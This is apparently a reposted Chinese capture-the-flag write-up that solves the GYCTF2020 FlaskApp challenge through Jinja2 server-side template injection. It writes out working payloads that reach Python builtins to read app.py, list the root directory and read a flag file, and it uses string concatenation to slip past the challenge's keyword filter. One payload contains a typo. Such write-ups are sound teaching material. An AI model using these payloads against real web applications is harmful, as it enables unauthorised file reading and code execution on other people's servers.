[GYCTF2020]FlaskApp
1.前言
最近的比赛太多了,每个比赛里面的Web方向的题目都千奇百怪,最近的Web题目能够遇到一个之前了解过的漏洞是越来越难了。像我这种已经被边缘化的Web狗在这种大比赛面前已经没有生存的空间了。仍然是继续补习SSTI的一天,继续打靶场吧。
2.正文
首先拿到题目
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/9106517f70354a0e9022a0f2751e1626.png)
![[GYCTF2020]FlaskApp](https://www.johngo689.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
这是一个用flask写的用来加解密base64的Web应用程序。我们来测试一下它的报错情况,因为对于python来讲base64的解密过程,如果用户所输入的字符的格式不是base64的话,程序就会报出一个异常错误。所以,我们在解密窗口随便输一串字符就可以了(不会有人随便输一串字符都是base64的吧doge)
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/4363cf6115b142c4a3be0848483d1c78.png)
我们看到了一个熟悉的函数render_template_string(),这说明这个网站存在着SSTI,我们尝试注入{{11}}
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/18a9f440b0114f588d28e35a2dd821d2.png)
解密结果
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/1d3afa28c9d24ed2b3dcb3f3132583dc.png)
可以看到是可以将用户的输入进行渲染的,我们完成了SSTI的测试。但是,事实上我们用{{2 _2}}进行测试的时候,遇到了拦截,看来该程序存在着一个小的WAF。
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/28e14bb939894b228828fbe0725b9cbb.png)
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/792490a4f1bf442192f8563e8725436f.png)
先输入
{{().__class__.__mro__}}尝试一下![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/4f0946f170374af1a7d8b345d954c376.png)
我们要利用object对象进行测试同时也要找到含有内建函数__builtins__的类,再借用builtins中的open来读取源文件。
{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/4eb28a44ad064c738b896ff704d38e6c.png)
我们从源码中读到了一些信息,其中就有waf的过滤信息。我们用字符串拼接的方式进行绕过。我们这一次构造列出根目录信息的payload
{% for c in ().__class__.__mro[-1]__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/d90c24562ed84153a82403cf5f27f72e.png)
我们看到了一个this_is_the_flag.txt文件,通过小改一下第一次的payload,来构造这一次的文件读取payload。
{% for c in ().__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_f' + 'lag.txt','r').read()}}{% endif %}{% endfor %}
![[GYCTF2020]FlaskApp](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230809/9bb7577170784b63ad8df2716e4afc2e.png)
后记
这道题的预期解并不是这个样子的,这道题的预期解是通过flask的pin码来从debug界面获得一个可用的命令行。但是最近在学SSTI而且看到了网上很多大师傅的绕过姿势,就想着自己也用纯SSTI的方式来做这道题。
Original: https://blog.csdn.net/Mrs_H/article/details/121322911
Author: 入山梵行
Title: [GYCTF2020]FlaskApp
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/747303/
转载文章受原作者版权保护。转载请注明原作者出处!